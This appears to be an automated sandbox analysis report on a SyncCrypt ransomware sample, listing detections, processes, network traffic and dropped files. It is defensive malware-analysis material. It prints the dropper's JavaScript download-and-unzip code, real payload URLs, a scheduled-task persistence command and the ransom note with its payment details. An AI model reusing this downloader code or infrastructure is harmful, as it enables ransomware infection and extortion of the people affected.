Source: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.jpg | virustotal: 18/58 detections: Emsisoft: Trojan.Ransom.BTF (B), MicroWorld-eScan: Trojan.Ransom.BTF, McAfee-GW-Edition: SyncCrypt!Zip, GData: Trojan.Ransom.BTF, Sophos: Troj/SyncCt-A, McAfee: SyncCrypt!Zip, TrendMicro: TROJ_RANSOMNOTE.AUSTYV, Cyren: JPG/SyncCrypt.A, Symantec: Trojan.Randsom.A, BitDefender: Trojan.Ransom.BTF, TrendMicro-HouseCall: TROJ_RANSOMNOTE.AUSTYV, Arcabit: Trojan.Ransom.BTF, ViRobot: JPG.S.SyncCrypt.1040099, Ikarus: Trojan.Ransom, DrWeb: Trojan.Encoder.13697, Ad-Aware: Trojan.Ransom.BTF, AhnLab-V3: BinImage/Synccrypt, F-Secure: Trojan.Ransom.BTF | Perma Link |
Source: CourtOrder_845493809.wsf | virustotal: 36/58 detections Avast: Other:Malware-gen [Trj], AVG: Other:Malware-gen [Trj], AegisLab: Troj.Script.Agent!c, Qihoo-360: Trojan.Generic, BitDefender: Trojan.Agent.CLKF, Emsisoft: Trojan.Agent.CLKF (B), MicroWorld-eScan: Trojan.Agent.CLKF, McAfee-GW-Edition: JS/Nemucod.xo, Fortinet: JS/Agent.SU!tr, GData: Script.Trojan-Downloader.SyncCrypt.A, Sophos: Mal/Psyme-A, McAfee: JS/Nemucod.xo, TrendMicro: JS_NEMUCOD.ELDSAUJG, Cyren: JS/Agent.SU!Eldorado, Symantec: JS.Downloader, Tencent: Js.Trojan.Raas.Auto, Panda: JS/Downloader.BRW, ZoneAlarm: HEUR:Trojan.Script.Agent.gen, TheHacker: VBS/Psyme, Rising: Trojan.Locky/JS!1.A549 (cloud:pT6AWwtp6PR), F-Prot: JS/Agent.SU!Eldorado, nProtect: Script-JS/W32.SyncCrypt-Downloader, CAT-QuickHeal: JS.Nemucod.EGL, ALYac: Trojan.Downloader.WSF.Agent, NANO-Antivirus: Trojan.Script.Heuristic-js.iacgm, Ad-Aware: Trojan.Agent.CLKF, AhnLab-V3: JS/Downloader, TrendMicro-HouseCall: JS_NEMUCOD.ELDSAUJG, Arcabit: Trojan.Agent.CLKF, Microsoft: TrojanDownloader:JS/Telicodeq.A, ViRobot: WSF.S.D | Perma Link |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: -----BEGIN PUBLIC KEY-----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuHSaciHs234HFdvavCdAUL/dvBtWZo5e8SAkm19mQLX5VTzBoscekoJOoPHeAqGFHboj+8TQMZZl/tq5o7W4ZAjSkmEMmeNYgETNbnw8QLa1q4CtmU8W9QzTxcS+HFOo/gh0GYNMr1XqK/IksjhUYQREGnGp20jCeJmTEp+AWp5TvDtFRC/PzAVCuO | 5_2_00401630 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: -----BEGIN PUBLIC KEY-----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuHSaciHs234HFdvavCdAUL/dvBtWZo5e8SAkm19mQLX5VTzBoscekoJOoPHeAqGFHboj+8TQMZZl/tq5o7W4ZAjSkmEMmeNYgETNbnw8QLa1q4CtmU8W9QzTxcS+HFOo/gh0GYNMr1XqK/IksjhUYQREGnGp20jCeJmTEp+AWp5TvDtFRC/PzAVCuO | 5_2_00405600 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: -----BEGIN PUBLIC KEY-----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuHSaciHs234HFdvavCdAUL/dvBtWZo5e8SAkm19mQLX5VTzBoscekoJOoPHeAqGFHboj+8TQMZZl/tq5o7W4ZAjSkmEMmeNYgETNbnw8QLa1q4CtmU8W9QzTxcS+HFOo/gh0GYNMr1XqK/IksjhUYQREGnGp20jCeJmTEp+AWp5TvDtFRC/PzAVCuO | 5_1_00401630 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: -----BEGIN PUBLIC KEY-----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuHSaciHs234HFdvavCdAUL/dvBtWZo5e8SAkm19mQLX5VTzBoscekoJOoPHeAqGFHboj+8TQMZZl/tq5o7W4ZAjSkmEMmeNYgETNbnw8QLa1q4CtmU8W9QzTxcS+HFOo/gh0GYNMr1XqK/IksjhUYQREGnGp20jCeJmTEp+AWp5TvDtFRC/PzAVCuO | 5_1_00405600 |
Source: sync.exe | Binary or memory string: -----BEGIN PUBLIC KEY----- MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuHSaciHs234HFdvavCdA UL/dvBtWZo5e8SAkm19mQLX5VTzBoscekoJOoPHeAqGFHboj+8TQMZZl/tq5o7W4 ZAjSkmEMmeNYgETNbnw8QLa1q4CtmU8W9QzTxcS+HFOo/gh0GYNMr1XqK/IksjhU YQREGnGp20jCeJmTEp+AWp5TvDtFRC/PzAVCuO | |
Source: C:\Windows\System32\wscript.exe | File dropped: C:\Users\LUKETA~1\AppData\Local\Temp\BACKUP~1\readme.html -> decryption sofware requires that you send <em>exactly the ammount of bitcoin (without the transaction fee)</em> that is written within the text file to the following address:<br><br><ul><li><em>15lk2bqxj2mjgzz3kcui3b4c42cqkkmqzk</em></li></ul><br>note that if the ammount sent doesn't match exactly the ammount in the text file, you will not receive the sofware, as it's the only way to validate and confirm the payment.<br><br><li>after the payment is done, send an email to all of the following addresses <a href="mailto:getmyfiles@keemail.me, getmyfiles@scryptmail.com, getmyfiles@mail2tor.com">getmyfiles@keemail.me, getmyfiles@scryptmail.com, getmyfiles@mail2tor.com</a> containg:</li><ul><li><em>the file named key, located within the readme folder on your desktop, as an attachment</em> - this file is a locked version of the decryption key (that must be unlocked by us), used to recover your files. do not delete it if |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 4x nop then sub esp, 1Ch | 5_2_004E6ED0 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 4x nop then mov eax, dword ptr [esp+04h] | 5_2_0045BED7 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 4x nop then sub esp, 1Ch | 5_1_004E6ED0 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 4x nop then mov eax, dword ptr [esp+04h] | 5_1_0045BED7 |
Source: global traffic | HTTP traffic detected: GET /X8IOl.jpg HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: curl/7.51.0Host: sm.uploads.im |
Source: global traffic | HTTP traffic detected: GET /mxRqXF/arrival.jpg HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: curl/7.51.0Host: image.ibb.co |
Source: wscript.exe | String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo) |
Source: wscript.exe | String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo) |
Source: wscript.exe | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo) |
Source: unknown | DNS traffic detected: queries for: image.ibb.co |
Source: wscript.exe | String found in binary or memory: file:///c:/users/user/appdata/local/temp/sfbi1uok.zipe |
Source: wscript.exe | String found in binary or memory: file:///c:/users/user/appdata/local/temp/sfbi1uok.zipu |
Source: wscript.exe | String found in binary or memory: file:///c:/users/user/desktop/courtorder_845493809.wsf |
Source: wscript.exe, CourtOrder_845493809.wsf | String found in binary or memory: http://185.10.202.115/images/arrival.jpg |
Source: wscript.exe | String found in binary or memory: http://185.10.202.115/images/arrival.jpgo |
Source: wscript.exe | String found in binary or memory: http://crl.comodo.net/utn-userfirst-hardware.crl0q |
Source: wscript.exe | String found in binary or memory: http://crl.comodoca.com/utn-userfirst-hardware.crl06 |
Source: wscript.exe | String found in binary or memory: http://crl.entrust.net/2048ca.crl0 |
Source: wscript.exe | String found in binary or memory: http://crl.entrust.net/server1.crl0 |
Source: wscript.exe | String found in binary or memory: http://crl.pkioverheid.nl/domorganisatielatestcrl-g2.crl0 |
Source: wscript.exe | String found in binary or memory: http://crl.pkioverheid.nl/domovlatestcrl.crl0 |
Source: wscript.exe | String found in binary or memory: http://crl.usertrust.com/utn-userfirst-object.crl0) |
Source: wscript.exe | String found in binary or memory: http://crt.comodoca.com/utnaddtrustserverca.crt0$ |
Source: wscript.exe | String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0 |
Source: sync.exe | String found in binary or memory: http://gcc.gnu.org/bugs.html): |
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com0 |
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com0% |
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com0- |
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com0/ |
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com05 |
Source: wscript.exe | String found in binary or memory: http://ocsp.entrust.net03 |
Source: wscript.exe | String found in binary or memory: http://ocsp.entrust.net0d |
Source: wscript.exe, CourtOrder_845493809.wsf | String found in binary or memory: http://sm.uploads.im/x8iol.jpg |
Source: wscript.exe | String found in binary or memory: http://uploads.im/ |
Source: wscript.exe | String found in binary or memory: http://www.digicert.com.my/cps.htm02 |
Source: wscript.exe | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0 |
Source: sync.exe | String found in binary or memory: http://www.openssl.org/support/faq.html |
Source: sync.exe | String found in binary or memory: http://www.openssl.org/support/faq.htmlrand |
Source: wscript.exe | String found in binary or memory: http://www.public-trust.com/cgi-bin/crl/2018/cdp.crl0 |
Source: wscript.exe | String found in binary or memory: http://www.public-trust.com/cps/omniroot.html0 |
Source: wscript.exe | String found in binary or memory: http://www.usertrust.com1 |
Source: wscript.exe | String found in binary or memory: https://ibb.co/ |
Source: wscript.exe, CourtOrder_845493809.wsf | String found in binary or memory: https://image.ibb.co/mxrqxf/arrival.jpg |
Source: wscript.exe | String found in binary or memory: https://secure.comodo.com/cps0 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49195 |
Source: unknown | Network traffic detected: HTTP traffic on port 49195 -> 443 |
Source: | Initial file: function busy_sleep(e){for(passed=0;passed++!=e;)for(var t=(makeid(),makeid(),(new Date).getTime()+1e3);(new Date).getTime()<t;);}function unzip(e,t){var i,o,r=new ActiveXObject("Scripting.FileSystemObject"),n=new ActiveXObject("Shell.Application");t||(t="."),r.FolderExists(t)||r.CreateFolder(t),i=n.NameSpace(r.getFolder(t).Path),o=n.NameSpace(r.getFile(e).Path),r.FileExists(e)&&i.CopyHere(o.Items(),20)}function download(e,t){var i=new ActiveXObject("MSXML2.ServerXMLHTTP");i.open("GET",e,!1),i.setRequestHeader("User-Agent","curl/7.51.0"),i.setOption(2,13056);var o=6e4,r=6e4,n=6e4,s=6e4;if(i.setTimeouts(o,r,n,s),i.send(),200==i.status){var a=new ActiveXObject("Scripting.FileSystemObject");a.FileExists(t)&&a.DeleteFile(t);var c=new ActiveXObject("ADODB.Stream");return c.Open(),c.Type=1,c.Write(i.responseBody),c.Position=0,c.SaveToFile(t),c.Close(),0}return i.status}function makeid(){for(var e="",t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",i=0;8>i;i++)e+=t.charAt(Math.floor(Math.random()*t. |
Source: | Initial file: function busy_sleep(e){for(passed=0;passed++!=e;)for(var t=(makeid(),makeid(),(new Date).getTime()+1e3);(new Date).getTime()<t;);}function unzip(e,t){var i,o,r=new ActiveXObject("Scripting.FileSystemObject"),n=new ActiveXObject("Shell.Application");t||(t="."),r.FolderExists(t)||r.CreateFolder(t),i=n.NameSpace(r.getFolder(t).Path),o=n.NameSpace(r.getFile(e).Path),r.FileExists(e)&&i.CopyHere(o.Items(),20)}function download(e,t){var i=new ActiveXObject("MSXML2.ServerXMLHTTP");i.open("GET",e,!1),i.setRequestHeader("User-Agent","curl/7.51.0"),i.setOption(2,13056);var o=6e4,r=6e4,n=6e4,s=6e4;if(i.setTimeouts(o,r,n,s),i.send(),200==i.status){var a=new ActiveXObject("Scripting.FileSystemObject");a.FileExists(t)&&a.DeleteFile(t);var c=new ActiveXObject("ADODB.Stream");return c.Open(),c.Type=1,c.Write(i.responseBody),c.Position=0,c.SaveToFile(t),c.Close(),0}return i.status}function makeid(){for(var e="",t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",i=0;8>i;i++)e+=t.charAt(Math.floor(Math.random()*t. |
Source: | Initial file: function busy_sleep(e){for(passed=0;passed++!=e;)for(var t=(makeid(),makeid(),(new Date).getTime()+1e3);(new Date).getTime()<t;);}function unzip(e,t){var i,o,r=new ActiveXObject("Scripting.FileSystemObject"),n=new ActiveXObject("Shell.Application");t||(t="."),r.FolderExists(t)||r.CreateFolder(t),i=n.NameSpace(r.getFolder(t).Path),o=n.NameSpace(r.getFile(e).Path),r.FileExists(e)&&i.CopyHere(o.Items(),20)}function download(e,t){var i=new ActiveXObject("MSXML2.ServerXMLHTTP");i.open("GET",e,!1),i.setRequestHeader("User-Agent","curl/7.51.0"),i.setOption(2,13056);var o=6e4,r=6e4,n=6e4,s=6e4;if(i.setTimeouts(o,r,n,s),i.send(),200==i.status){var a=new ActiveXObject("Scripting.FileSystemObject");a.FileExists(t)&&a.DeleteFile(t);var c=new ActiveXObject("ADODB.Stream");return c.Open(),c.Type=1,c.Write(i.responseBody),c.Position=0,c.SaveToFile(t),c.Close(),0}return i.status}function makeid(){for(var e="",t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",i=0;8>i;i++)e+=t.charAt(Math.floor(Math.random()*t. |
Source: unknown | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /CREATE /F /TN sync /TR 'C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe -e \'C:\Users\user\desktop\'' /sc once /st 11:24:00 |
Source: C:\Windows\System32\cmd.exe | Directory queried: number of queries: 1045 |
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\LUKETA~1\AppData\Local\Temp\BACKUP~1\sync.exe |
Source: C:\Windows\System32\wscript.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob |
Source: C:\Windows\System32\wscript.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00401500 GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress, | 5_2_00401500 |
Source: sync.exe.0.dr | Static PE information: section name: .eh_fram |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00404A24 push eax; mov dword ptr [esp], 00000000h | 5_2_00404A3C |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_0057150F push ecx; mov dword ptr [esp], ebx | 5_2_00571549 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00401630 push eax; mov dword ptr [esp], 00000BB8h | 5_2_004016AB |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00401630 push eax; mov dword ptr [esp], ebx | 5_2_004016B9 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00535FC0 push eax; mov dword ptr [esp], ebx | 5_2_005361C2 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00536D40 push eax; mov dword ptr [esp], ebx | 5_2_0053703F |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00537310 push eax; mov dword ptr [esp], ebx | 5_2_0053760F |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_004E42D0 push eax; mov dword ptr [esp], esi | 5_2_004E4345 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_1_00404A24 push eax; mov dword ptr [esp], 00000000h | 5_1_00404A3C |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_1_0057150F push ecx; mov dword ptr [esp], ebx | 5_1_00571549 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_1_00401630 push eax; mov dword ptr [esp], 00000BB8h | 5_1_004016AB |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_1_00401630 push eax; mov dword ptr [esp], ebx | 5_1_004016B9 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_1_00535FC0 push eax; mov dword ptr [esp], ebx | 5_1_005361C2 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_1_00536D40 push eax; mov dword ptr [esp], ebx | 5_1_0053703F |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_1_00537310 push eax; mov dword ptr [esp], ebx | 5_1_0053760F |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00401630 CreateDirectoryA,Sleep,system,system,GetLogicalDriveStringsA,lstrlenA,GetDriveTypeA,lstrlenA,ShellExecuteExA,WaitForSingleObject,GetSystemWindowsDirectoryA,tolower,tolower,remove,time,srand,rand,malloc,fopen,fwrite,fclose,fopen,fopen,malloc,malloc,fwrite,fread,fwrite,fwrite,free,free,fclose,fclose,remove,_chmod,remove,remove,remove,system,system,system, | 5_2_00401630 |
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49} |
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49} |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd} |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd} |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: C:\Windows\System32\cmd.exe | Directory queried: number of queries: 1045 |
Source: Window Recorder | Window detected: More than 3 window changes detected |
Source: classification engine | Classification label: mal96.evad.rans.winWSF@16/7@4/4 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | File created: C:\Users\user\desktop\README\ |
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.jpg |
Source: C:\Windows\System32\schtasks.exe | Console Write: ........a..u..0.............t...............................`.N...8...:...:.....P.#...N.........d.#..........WgZ..#.G..v |
Source: C:\Windows\System32\cmd.exe | Console Write: ........n#.......... . . . . . . . .1. .f.i.l.e.(.s.). .m.o.v.e.d.......V..J ...........p..........uD...4...`.....,..... |
Source: C:\Windows\System32\cmd.exe | Console Write: ........n#.......... . . . . . . . .1. .f.i.l.e.(.s.). .m.o.v.e.d.......V.DJt.!...........!........u..!.4...`.....,..... |
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini |
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: CourtOrder_845493809.wsf | Virustotal: hash found |
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\CourtOrder_845493809.wsf' |
Source: unknown | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /CREATE /F /TN sync /TR 'C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe -e \'C:\Users\user\desktop\'' /sc once /st 11:24:00 |
Source: unknown | Process created: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe -e 'C:\Users\user\desktop' |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c move /y readme.html 'C:\Users\user\desktop\README\readme.html' |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c move /y readme.png 'C:\Users\user\desktop\README\readme.png' |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cmd /c net view |
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c net view |
Source: unknown | Process created: C:\Windows\System32\net.exe net view |
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c dir C:\ /s /b /a-d >> WAJSFDWJWP |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /CREATE /F /TN sync /TR 'C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe -e \'C:\Users\user\desktop\'' /sc once /st 11:24:00 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c move /y readme.html 'C:\Users\user\desktop\README\readme.html' |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c move /y readme.png 'C:\Users\user\desktop\README\readme.png' |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cmd /c net view |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c dir C:\ /s /b /a-d >> WAJSFDWJWP |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c net view |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net view |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: String function: 00413910 appears 113 times | |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: String function: 00414410 appears 267 times | |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: String function: 00406EA0 appears 60 times | |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: String function: 00440BB0 appears 172 times | |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: String function: 004048A4 appears 48 times | |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: String function: 00448F80 appears 34 times | |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: String function: 00430AD0 appears 31 times | |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: String function: 00413950 appears 212 times | |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: String function: 004333A0 appears 119 times | |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: String function: 00433B10 appears 46 times | |
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts |
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts |
Source: CourtOrder_845493809.wsf | Initial sample: Strings found which are bigger than 50 |
Source: | Initial file: function busy_sleep(e){for(passed=0;passed++!=e;)for(var t=(makeid(),makeid(),(new Date).getTime()+1e3);(new Date).getTime()<t;);}function unzip(e,t){var i,o,r=new ActiveXObject("Scripting.FileSystemObject"),n=new ActiveXObject("Shell.Application");t||(t="."),r.FolderExists(t)||r.CreateFolder(t),i=n.NameSpace(r.getFolder(t).Path),o=n.NameSpace(r.getFile(e).Path),r.FileExists(e)&&i.CopyHere(o.Items(),20)}function download(e,t){var i=new ActiveXObject("MSXML2.ServerXMLHTTP");i.open("GET",e,!1),i.setRequestHeader("User-Agent","curl/7.51.0"),i.setOption(2,13056);var o=6e4,r=6e4,n=6e4,s=6e4;if(i.setTimeouts(o,r,n,s),i.send(),200==i.status){var a=new ActiveXObject("Scripting.FileSystemObject");a.FileExists(t)&&a.DeleteFile(t);var c=new ActiveXObject("ADODB.Stream");return c.Open(),c.Type=1,c.Write(i.responseBody),c.Position=0,c.SaveToFile(t),c.Close(),0}return i.status}function makeid(){for(var e="",t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",i=0;8>i;i++)e+=t.charAt(Math.floor(Math.random()*t. |
